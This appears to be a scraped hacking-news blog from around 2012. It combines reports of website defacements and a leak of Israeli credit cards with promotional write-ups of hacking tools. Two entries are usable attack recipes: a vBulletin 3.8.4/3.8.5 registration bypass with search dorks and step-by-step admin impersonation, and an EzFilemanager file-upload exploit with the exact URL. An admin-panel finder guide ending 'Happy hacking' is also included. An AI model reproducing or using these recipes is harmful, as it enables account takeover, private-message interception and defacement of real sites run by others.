100+ pakistani website got hacked by ICA-INDISHELL 03.23

Once again Pakistani cyberspace hit by ICA-INDISHELL.This time FfeSsxt Prince, H3r0 and Magnum Sniper have hacked 40+ pakistani websites. The message they have posted on the defacepage is as follow
“ We arent afraid of any shit that comes to us !! We'll Do anything to Keep our Country's Pride Up and High !! Jihaad = War = Shit. One Person gives u bayaan on Jihaad and encourages you to kill people and says "ye sawaab ka kaam hai","rizzak ka kaam hai" and you do sins even without thinking the consequences !! But you Dony Know Tht Terrorism is unnecessary violence against innocent civilians; Qur'aan forbids this. You have read the Qur'aan, you should know this & yet if you are supporting Terrorism means you are'nt Muslim.We are Proud of People we have in India who are ready to deal with any such incidents !! Officers, Soldiers who are ready to die for their Motherland .”

they have posted the list of websites on pastebin.

click here to see the list

FTC OWNED BY ANTISEC 09.55

FTC OWNED BY ANTISEC

After the Library of Congress , FTC OWNED BY ANTISEC due to SOPA / PIPA / ACTA .
They have posted the message on paste-bin “ If SOPA/PIPA/ACTA passes we will wage a relentless war against the corporate internet, destroying dozens upon dozens of government and company websites. As you are reading this we are amassing our allied armies of darkness, preparing boatloads of stolen booty for our next raid. We are sitting on hundreds of rooted servers,getting ready to drop all your mysql dumps and mail spools. Your passwords? Your precious bank accounts? Even your online dating details?! You ain't even trying to step to this.”



You can see leaked data here

Zone-H Hacked 01.38

The leading deface mirroring website (www.zone-h.com) has been hacked by HcJ & Cyb3R-1sT & Egyptian.H4x0rZ & Sas-TerrOrisT & H311 c0d3 & Red Virus
The hackers claimed that they rooted the server hacking:
www.zone-h.com
www.zone-h.org
www.zone-h.com.br
forum.zone-h.com.br
br.zone-h.org
www.zone-h.net
The Hacker had added this message on there deface:

                                                                   "To be OR not TO be

Note : It's Unacceptable when we tried to notify defaced.zone-h.net and found tNote : It's Unacceptable when we tried to notify defaced.zone-h.net and found this message " nice try" it's not a try it's a real! your server rooted, all the websites hacked, all people knew that ! and it's the third time to hack your websites 2 of them in 2010( 2010/04/02 > brazilian domains + 06/2010 zone-h.com defacement database ),and now ! you should have the courage and allow the defacers
to notify your sites, it's the real courage !"

The reason they gave was that zone-h didnt submit the deface of their own website (defaced.zone-h.net) giving the message " Nice Try "

This isn't the first time zone-h is being hacked, it has been hacked before in 2010 as well .

Library of Congress USA HACKED BY SECTOR 404 #OPMEGAUPLOAD 11.15

Library of Congress USA HACKED BY SECTOR 404 #OPMEGAUPLOAD

Library of Congress USA HACKED BY SECTOR 404 #OPMEGAUPLOAD. Fbi have shutdown the megaupload due to SOPA and the Anonymous have ddosed FBI.gov after that today SECTOR 404 have hacked Library of Congress you can see the leaked data here.

Mobius Forensic Toolkit 0.5.10–Forensics Framework To Manage Cases & Case Items 12.54

Mobius Forensic Toolkit is a forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. Cases and item categories are defined using XML files for easy integration with other tools.

Installation

As root, type:

python setup.py install

Usage
Run mobius_bin.py.

You can download Mobius 0.5.10 here:
mobiusft-0.5.10.tar.gz

mobiusft-0.5.10.zip

THA (The Hackers Army) official website got hacked !! 08.43

The hackers army have hacked more then 1K innocent sites for #op free PALESTAIN and they have challenged to the HaXroot and they have told that “ HaXroot you are noob !! ” and after that the official website of Tha (the hackers army) got hacked by Hacked by HaX.R00T ,CFR Robot Pirate and Pakos Hacker !!

Haxroot have posted the snapshot of the comments !!

you can see the hacked website and mirror here

website : http://www.thehackersarmy.net/

mirror : http://www.zone-hack.com/defacements/?id=39294

Admin finder perl script 15.40

The things you need
1. Active perl (click here to download)
2. admin finder script (click here to download )
Install the active perl and extract the archive in to “c:\perl\bin” now go to start > run and type CMD and hit enter now type “cd c:\perl\bin” and hit enter after that paste the perl script name “admin_CP_finder.pl ” and just hit enter now enter the site which you want to find admin penal and hit enter (I have hide my site) and now enter the source code of the website (my site have asp source code so I have added 2) and just hit enter. you will found the admin penal. Happy hacking.

vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability 04.37

Software Link: http://www.vbulletin.org
Version: 3.8.4 & 3.8.5
Google dork 1 : powered by vBulletin 3.8.4
Google dork 2 : powered by vBulletin 3.8.5
Platform / Tested on: Multiple
Category: webapplications

BUG :
1 . Go to Http://[localhost]/path/register.php
2 . Assume that forum admin user name is ADMIN
3 . Type this at User Name ===> ADMIN&#00
4 . &#00 is an ASCII Code
5 . And complete the other parameters
6 . Then click on Complete Registrarion
7 . Now you see that your user name like admin user name After this time the private messages to the user (ADMIN) to sending see for you is sending .

Patch : 1 . Go to AdminCP
2 . Click on vBulletin Options and choose vBulletin Options
3 . Choose Censorship Options
4 . type &# in Censored Words section
5 . Then click on Save
This works only with vBulletin 3.8.4 and 3.8.5 ,if it doesnt work,that means some other has already used that username u want also ,try to use an other admins username,if it wont work still,then that means they have fixed this problem !!

Blind Cat: A Blind SQL Injection Exploitation Tool 03.28

Blind Cat: A Blind SQL Injection Exploitation Tool

Blind Cat is not a fully automated tool, the ones we call – “one click ownage“. You are the driving force behind this tool. Once, you understand how this tool works, you will be able to exploit a lot more difficult SQL injections easily. Consider this tool as an automation tool/front-end for manual blind SQL injections.

Click here to Download

Israel treating hackers like terrorists 11.41

The message from Deputy Foreign Minister Dany Ayalon came after a self-defined "Saudi hacker" from a cabal known as "group-xp" published details of more than 6,000 Israeli credit cards online that "The US has announced that any attack on its cybernetic space would be considered a declaration of war and that it would go as far as firing missiles to respond to such an attack. This is a good criterion for us all".

Israel said that it will respond to cyber-attacks in the same way it responds to violent terrorist acts, by striking back with force against hackers who threaten the Jewish state.

Almost immediately after an Israeli computer expert declared the hacker's true identity to be 19-year-old Mexican waiter Omar Habib, the Israeli website Ynet claimed the real hacker contacted them via email to mock the false identification.

“If a stupid student thinks he can find me (within) 8 hours of work, what will Mossad do? But I'm still here and no one can find me, make sure, no worries,” said by Saudi hacker 0xOmar of “group-XP”

"It is necessary to send a message to everyone who attacks or tries to attack Israel, including in cyberspace, that they are putting themselves in danger and that they will not benefit from any immunity against reprisal actions from Israel" Ayalon said.

After examining the details, Israel's major credit card companies said only 14,000 valid cards had been exposed.

EzFilemanager Deface Upload vulnerability 04.00

Google dork for EzFilemanager is “ inurl:ezfilemanager/ezfilemanager.php ”

(you can modify this dork for getting mor results from Google )

Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and

put ?sa=1&type=file after URL

now url will be : http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
now see the upload option and you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files

live Demo
result

BackBox Linux 2.01 released 01.28

The BackBox team is proud to announce the release 2.01 of BackBox Linux.The new release include features such as Ubuntu 11.04, Linux Kernel 2.6.38 and Xfce 4.8.0. The ISO images (32bit & 64bit) can be downloaded from the following location: http://www.backbox.org/downloads
What's new

• System upgrade
• Performance boost
• New look
• Improved start menu

Bug corrections

• New sections such as Forensic Analysis, Documentation & Reporting and Reverse Engineering
• New Hacking tools and updated tools such as dradis 2.8, ettercap 0.7.4.2, john 1.7.8, metasploit 4.2, nmap 5.51, set 2.5.2, sleuthkit 3.2.1, w3af 1.0, weevely 0.5, wireshark 1.6.3, etc.

System requirements

• 32-bit or 64-bit processor
• 256 MB of system memory (RAM)
• 4.4 GB of disk space for installation
• Graphics card capable of 800×600 resolution
• DVD-ROM drive or USB port

400000 Israeli Credit Cards & Information Leaked by Saudi Arabia Hackers 06.25

Hacker named "0xOmar" from group-xp, largest Wahhabi hacker group of Saudi Arabia claim to Hack lot of Israeli servers, lot of information about Israeli people including their name, address, city, zipcode, Social Security Numbers (Israeli IDnumbers), mobile phone number, home phone number, credit card number (including exp year, month and CVV). According to announcements from the credit card companies, 6,600 of the stolen cards belong to Isracard Ltd., 4,000 to Leumi Card Ltd., and 3,000 to Israel Credit Cards-Cal Ltd. (ICC-Cal) (Visa).

Hacker says "We daily use these cards to solve our problems, purchasing VPNs, VPSes, softwares, renting GPU clusters, renting cloud servers and much more!". They Claim themselves as part of Anonymous hacking Group from Saudi Arabian. "my goal is reacing 1 million non-duplicate people, which is 1/6 of Israel's population." He said.

Quick Description of Leaked Data at Pastebin:

• 4000.htm, it includes 4000+ credit cards and all needed information. All is Israeli.
• 27000.htm, it includes 27000+ credit cards and all needed information. All is Israeli.
• Cards1.mdb, it includes 260272 credit cards and all needed information. It includes address, emails and passwords of 260272 Israeli people.
• Cards2.mdb, it includes 120745 credit cards and all needed information. It includes address, emails and passwords of 120745 Israeli people.
• IsraCards1.txt, it includes 184 working fresh Israeli credit cards and all needed information.
• Business.mdb, it includes 22604 Israeli business people details, including, names, addresses, phone numbers, passwords, etc.
• Judaism.txt, it includes 65 Zionist people who purchased stuff from Judaism web site
• TblDonate.htm, it includes 500+ people who donated to Israeli Zionist Rabbis.

In response to the cyber attack, Dov Kotler, CEO of Isracard, a unit of Bank Hapoalim said that the credit-card user details that appeared on the page were mostly incorrect or belonged to the cards that were deactivated long ago. The leaked data also contains numerous repeated entries. The credit card companies immediately blocked all the cards on the list and assured the customers that money used to buy from these cards will be duly returned.

Patator – Multi Purpose Brute Forcing Tool 03.47

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. Basically the author got tired of using Medusa, Hydra, ncrack, metasploit auxiliary modules, nmap NSE scripts and the like because:

• They either do not work or are not reliable (false negatives several times in the past)
• They are slow (not multi-threaded or not testing multiple passwords within the same TCP connection)
• They lack very useful features that are easy to code in python (eg. interactive runtime)

Basically you should give Patator a try once you get disappointed by Medusa, Hydra or other brute-force tools and are about to code your own small script because Patator will allow you to:

• Not write the same code over and over
• Run multi-threaded
• Benefit for useful features such as the interactive runtime commands, response logging, etc.

Currently it supports the following modules:

• ftp_login : Brute-force FTP
• ssh_login : Brute-force SSH
• telnet_login : Brute-force Telnet
• smtp_login : Brute-force SMTP
• smtp_vrfy : Enumerate valid users using the SMTP VRFY command
• smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
• http_fuzz : Brute-force HTTP/HTTPS
• pop_passd : Brute-force poppassd (not POP3)
• ldap_login : Brute-force LDAP
• smb_login : Brute-force SMB
• mssql_login : Brute-force MSSQL
• oracle_login : Brute-force Oracle
• mysql_login : Brute-force MySQL
• pgsql_login : Brute-force PostgreSQL
• vnc_login : Brute-force VNC
• dns_forward : Forward lookup subdomains
• dns_reverse : Reverse lookup subnets
• snmp_login : Brute-force SNMPv1/2 and SNMPv3
• unzip_pass : Brute-force the password of encrypted ZIP files
• keystore_pass : Brute-force the password of Java keystore files

The name “Patator” comes from this tv interview clip – patator

Patator is NOT script-kiddie friendly, please read the README inside patator.py before reporting/complaining/asking me how to use this tool..

You can download Patator v0.3 here:

patator_v0.3.py